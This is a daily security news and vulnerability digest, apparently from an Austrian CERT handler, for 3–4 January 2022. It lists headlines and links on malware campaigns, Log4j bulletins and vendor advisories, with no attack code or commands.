End-of-Day report
Timeframe: Montag 03-01-2022 18:00 - Dienstag 04-01-2022 18:00
Handler: Thomas Pribitzer
Co-Handler: n/a
News
A Simple Batch File That Blocks People, (Tue, Jan 4th)
I found another script that performs malicious actions. Its a simple batch file (.bat) that is not obfuscated but it has a very low VT score (1/53).
https://isc.sans.edu/diary/rss/28212
Purple Fox rootkit now bundled with Telegram installer
The Purple Fox malware family has been found to combine its payload with trusted apps in an interesting way.
https://blog.malwarebytes.com/trojans/2022/01/purple-fox-rootkit-now-bundled-with-telegram-installer/
Mails zu Hacks von einer Telefonnummer? Nicht zurückrufen!
Kriminelle versenden aktuell E-Mails, bei denen als Absender eine Telefonnummer angezeigt wird. Angeblich wurden die Systeme der EmpfängerInnen gehackt und mit Viren infiziert. Deshalb müsse dringend die Nummer zurückgerufen werden. Achtung: Hier lauert eine Falle und die E-Mail kann ignoriert werden.
https://www.watchlist-internet.at/news/mails-zu-hacks-von-einer-telefonnummer-nicht-zurueckrufen/
A New Web Skimmer Campaign Targets Real Estate Websites Through Attacking Cloud Video Distribution Supply Chain
A supply chain attack leveraging a cloud video platform to distribute web skimmer campaigns compromised more than 100 real estate sites.
https://unit42.paloaltonetworks.com/web-skimmer-video-distribution/
Log4j flaw attack levels remain high, Microsoft warns
Organizations mights not realize their environments are already compromised.
https://www.zdnet.com/article/log4j-flaw-attacks-are-causing-lots-of-problems-microsoft-warns/
State-of-the-art EDRs are not perfect, fail to detect common attacks
A team of Greek academics has tested endpoint detection & response (EDR) software from 11 of todays top cybersecurity firms and found that many fail to detect some of the most common attack techniques used by advanced persistent threat actors, such as state-sponsored espionage groups and ransomware gangs.
https://therecord.media/state-of-the-art-edrs-are-not-perfect-fail-to-detect-common-attacks/
Vulnerabilities
Security updates for Tuesday
Security updates have been issued by Debian (salt and thunderbird), Red Hat (xorg-x11-server), and Scientific Linux (xorg-x11-server).
https://lwn.net/Articles/880327/
Security Bulletin: Vulnerabilities in Apache Log4j affect IBM Spectrum Copy Data Management (CVE-2021-45105, CVE-2021-45046)
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-apache-log4j-affect-ibm-spectrum-copy-data-management-cve-2021-45105-cve-2021-45046/
Security Bulletin: Apache Log4j vulnerabilities impact IBM Sterling Connect:Direct for UNIX (CVE-2021-45105, CVE-2021-45046)
https://www.ibm.com/blogs/psirt/security-bulletin-apache-log4j-vulnerabilities-impact-ibm-sterling-connectdirect-for-unix-cve-2021-45105-cve-2021-45046/
Security Bulletin: IBM Jazz for Service Management is vulnerable to a Apache Log4j vulnerability(CVE-2021-44228)
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-jazz-for-service-management-is-vulnerable-to-a-apache-log4j-vulnerabilitycve-2021-44228-3/
Security Bulletin: IBM Jazz for Service Management is vulnerable to a Apache Log4j vulnerabilities(CVE-2021-45105, CVE-2021-45046)
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-jazz-for-service-management-is-vulnerable-to-a-apache-log4j-vulnerabilitiescve-2021-45105-cve-2021-45046-3/
Security Bulletin: Vulnerabilities in Apache Log4j impact IBM Spectrum Protect Plus (CVE-2021-45105, CVE-2021-45046)
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-apache-log4j-impact-ibm-spectrum-protect-plus-cve-2021-45105-cve-2021-45046/
Security Bulletin: Vulnerabilities in Apache Log4j affect IBM Spectrum Protect Plus Container Backup and Restore for Kubernetes and OpenShift (CVE-2021-45105, CVE-2021-45046)
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-apache-log4j-affect-ibm-spectrum-protect-plus-container-backup-and-restore-for-kubernetes-and-openshift-cve-2021-45105-cve-2021-45046/
VMSA-2022-0001
https://www.vmware.com/security/advisories/VMSA-2022-0001.html
Atlassian Jira Software: Schwachstelle ermöglicht Cross-Site Scripting
http://www.cert-bund.de/advisoryshort/CB-K22-0002